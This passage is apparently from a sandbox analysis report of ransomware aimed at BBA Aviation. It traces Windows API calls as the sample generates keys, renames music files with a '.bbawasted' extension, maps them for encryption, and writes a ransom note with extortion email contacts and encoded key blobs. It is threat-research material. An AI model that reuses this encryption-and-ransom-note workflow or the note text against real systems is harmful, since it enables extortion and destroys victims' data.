[0221.056] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]huv52n/Kn8B9wtbqFaP9nKgMRqj9jkXPZ2w+sVBbOLxs78Rw1mraCiDdQn9gFsRc\r\n+Z6s/bcUxXwmlC38JOSYKAdl5DnfK9Ug8+0Pges1E7w4JUnjBNAHUfkh0KK9Ukdd\r\ncfEMDWzY69moJ1lJ0s7CFn8v4s1dZviR45HARj4r/tXP9p7Ckp93gbnYlxqe2X5R\r\nBUTsygd9FuqyTFMeCQF2pHjDaey4XJE/ld3SYNHF5A9avQrNn8VcOTMQyvXM/8l8\r\nhuwBxdL7rb4KtUv+XQ+lryxYjTHPOJ1eBxfwjvT/GSuvWpsTOjSDaUQO5pf8pokA\r\n2MxEKS2Xg1CRl5SxKNNBnwKwx4NcxbAsIpheARAyp0CePEIig6mfIsdkdf1HIaSZ\r\nZCgwj3dGBS/OzV+Ury6hgjSfeaxFoKxAio7r3B8lEdQmMknWUQ1JHiDjv1CrSwZD\r\nvx6tQS336Fp4+xwfd+VWffhp9MG7t+fzJxvihQiskExNceWTidHqExt7hoXewou2\r\niOtLkgYJJau4Uly4XOUfXgApb51BNJDJnkJpmg63Q9jStM6teDqBYdDCoyFzCOKJ\r\nUYms4ddS6WFWKVbstVz041uKUY9YJoVUPIC/4UxgiiRah48CmDVEnVhTrbE7zHMz\r\n+MOdTtAYGvQRXYh0Be+MBgGlY1SSuipJPVLJ5qiWs8W=[end_key]\r\nKEEP IT\r\n") returned 984 [0221.056] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0221.057] WriteFile (in: hFile=0x28c, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0221.057] SetEndOfFile (hFile=0x28c) returned 1 [0221.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0221.060] CloseHandle (hObject=0x28c) returned 1 [0221.060] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0221.061] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6becf8 | out: hHeap=0x660000) returned 1 [0221.061] _aulldvrm () returned 0x0 [0221.061] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a69b0) returned 1 [0221.062] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0221.062] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0221.062] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\9IA_5cbFGh\\R8Zz-W2sV2t2w5 e7POs.wav") returned 148 [0221.062] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x332) returned 0x6aecf0 [0221.062] lstrcpyW (in: lpString1=0x6aee18, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0221.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0221.063] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0221.063] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0221.063] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0221.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\9IA_5cbFGh\\R8Zz-W2sV2t2w5 e7POs.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\9ia_5cbfgh\\r8zz-w2sv2t2w5 e7pos.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0221.064] WriteFile (in: hFile=0x28c, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0221.066] SetEndOfFile (hFile=0x28c) returned 1 [0221.070] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0221.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0221.070] lstrcpyW (in: lpString1=0x6aee18, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0221.070] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\9IA_5cbFGh\\R8Zz-W2sV2t2w5 e7POs.wav" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\9ia_5cbfgh\\r8zz-w2sv2t2w5 e7pos.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\9IA_5cbFGh\\R8Zz-W2sV2t2w5 e7POs.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\9ia_5cbfgh\\r8zz-w2sv2t2w5 e7pos.wav.bbawasted")) returned 1 [0221.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\9IA_5cbFGh\\R8Zz-W2sV2t2w5 e7POs.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\9ia_5cbfgh\\r8zz-w2sv2t2w5 e7pos.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0221.072] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0221.072] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xa14a [0221.072] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa14a) returned 0x5f0000 [0221.072] CloseHandle (hObject=0x280) returned 1 [0221.074] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0221.075] CloseHandle (hObject=0x27c) returned 1 [0221.075] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0221.075] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a61b8) returned 1 [0221.076] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0221.078] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0221.078] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0221.079] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0221.276] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0221.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0221.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0221.323] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0221.323] _snwprintf (in: _Dest=0x6bb470, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]g3DyNgegolXIOzKqDN5WrK8R2drOA3Su2UpO3VZagkwma4WrVMoZiqM0+cf68E63\r\nBnM7df6cXNLByc2L3mhWLy2cnVB0sazok6BU45NS2NL4bkJTAWnr4MRtY2teIqTY\r\ne9XDJvsIlV0cLCQpt1SZvUnI1bYqIdmqO02ymY02jyamr0af8YGjo+dGMo0HqdAw\r\nBdAZBtFrl+hkrYqyyetGpnz9dmeQHU+y7YVvrj7crU5MSvpoGkMA3JCpJFauwgah\r\nUGxGIxqciL9/vD8FtDgoKRUSTI4H6i8wKCXW/32V+3BZwbIuMqoM6sKblKcVTy2J\r\nEYlNaLM+6VK/SYG6qzO64CH1+V9ZX7E6sfGvOZV4UtOZYZfsYWD+YC8vEunIKOn7\r\nwdUtCbFQJtK/vf8aSVAOhbvuw11/tvtm6HgjS4/wB2/Jm43jx+BfYaPI2LUd8k+6\r\ncnNnQcgTmMggf/DtajJMDrmrCTGF/FQs23Oa/l1ivL276ltAgiwoXyeMJhp/Ci2C\r\nb3QPHmIz2kS/PJrSCle/i/EntT5bWJWkVFZxMBcRYdltcYSrFVsDvkbh3bqbUpDm\r\nqnAXI5oe6xw1iLoauka6Gd/oFH8H8a70yN8tv4gig7pBfR+i/TZ5/27ddgBNlpHl\r\nE28pP8QNNP5lZpOoBsS05rvqrm3QmZYHho+BliIf+E8=[end_key]\r\nKEEP IT\r\n") returned 984 [0221.323] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0221.323] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0221.323] SetEndOfFile (hFile=0x28c) returned 1 [0221.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0221.327] CloseHandle (hObject=0x28c) returned 1 [0221.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0221.327] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c0220 | out: hHeap=0x660000) returned 1 [0221.327] _aulldvrm () returned 0x0 [0221.327] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a61b8) returned 1 [0221.328] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0221.328] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0221.328] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\O7VnG9ZCmLD_MZ_P.mp3") returned 154 [0221.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x33e) returned 0x6aecf0 [0221.329] lstrcpyW (in: lpString1=0x6aee24, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0221.329] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0221.329] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6c58) returned 1 [0221.329] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bb470 | out: pbBuffer=0x6bb470) returned 1 [0221.329] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0221.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\O7VnG9ZCmLD_MZ_P.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\o7vng9zcmld_mz_p.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0221.330] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0221.332] SetEndOfFile (hFile=0x28c) returned 1 [0221.332] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0221.332] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0221.332] lstrcpyW (in: lpString1=0x6aee24, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0221.332] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\O7VnG9ZCmLD_MZ_P.mp3" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\o7vng9zcmld_mz_p.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\O7VnG9ZCmLD_MZ_P.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\o7vng9zcmld_mz_p.mp3.bbawasted")) returned 1 [0221.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\xdzuWwQiVrPDWNIhzsEK\\O7VnG9ZCmLD_MZ_P.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\xdzuwwqivrpdwnihzsek\\o7vng9zcmld_mz_p.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0221.334] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0221.334] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x137c [0221.334] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x137c) returned 0x600000 [0221.334] CloseHandle (hObject=0x280) returned 1 [0221.335] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0221.335] CloseHandle (hObject=0x288) returned 1 [0221.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0221.335] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6bd0) returned 1 [0221.336] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0221.336] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0221.336] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6bd0) returned 1 [0221.337] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0221.337] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0221.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0221.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0221.879] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0221.879] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]hZDntrNTbY05oPB14T3eq1oKbu08bViCgXoRi62dd/wwfIVZ9J7n8y7RnEBJPH16\r\nqiCCXn+Upzi+hamwha4cOI33Q9M0Cnr3bzaAwgKevZU5pgNGzae2MSVNlay9HgAm\r\nYq7k9EZzW4EObxjKRPJpl7cT4YkTjQurqw518ryxXmWFaT8ibLZfoSb8GgK/ZW51\r\nCl9HNz7E8SeX8sFl9z1YBbuUZ6KnP62TbmwMLjVXbQqag7gtn0/jzlRxHz5DLbdP\r\nPynA6VU8Iga1o3oKoUqz8Acr3ZOEA9TVGiEAojORk7vYiX+CATycgiE1TzRSHOOA\r\nJIergDEj26WpKWLM/eP4FwJZMot1PkYzRUKCgtbSj1weQcH3ZloUtQPMch4cdoWL\r\nGtu2eblTtHbosh9VFWWSJUAR7YwMvp1K0GurHP1H/J9B1HpKNGjn3vz/KZSo3ajK\r\nmK5dx2yo69T/5a9qWFGfx9zEcpe+gLCAwsuFxrFB04AKYYrK8RJ6v3rbisDWT7Cj\r\nyc2kgQpyWLEAyLrujyuCgJtkpP4HcjcKuzMJ5Inb6mZkEUFZmXMNspk8jPJiwOWA\r\nXACXb9mZV7R/pVevCsm3wCJXLmI17D7wBzVy2sOz+aGWHQtzsvNFcru+FpLL8bZT\r\nPRLUU2FHt3eQBhgUbaozzVVral9U/+QmdIyHZAc3KUQ=[end_key]\r\nKEEP IT\r\n") returned 984 [0221.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0221.879] WriteFile (in: hFile=0x28c, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0221.879] SetEndOfFile (hFile=0x28c) returned 1 [0222.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0222.264] CloseHandle (hObject=0x28c) returned 1 [0222.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0222.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c06c8 | out: hHeap=0x660000) returned 1 [0222.265] _aulldvrm () returned 0x0 [0222.265] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6680) returned 1 [0222.265] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0222.265] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0222.265] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\Ui6W H7.m4a") returned 90 [0222.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2be) returned 0x6c4b88 [0222.266] lstrcpyW (in: lpString1=0x6c4c3c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0222.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0222.266] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6ce0) returned 1 [0222.266] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6bb470 | out: pbBuffer=0x6bb470) returned 1 [0222.266] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0222.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\Ui6W H7.m4a.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\ui6w h7.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0222.267] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0222.269] SetEndOfFile (hFile=0x28c) returned 1 [0222.269] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0222.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0222.269] lstrcpyW (in: lpString1=0x6c4c3c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0222.269] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\Ui6W H7.m4a" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\ui6w h7.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\Ui6W H7.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\ui6w h7.m4a.bbawasted")) returned 1 [0222.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\Ui6W H7.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\ui6w h7.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0222.270] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0222.271] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11aba [0222.271] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, 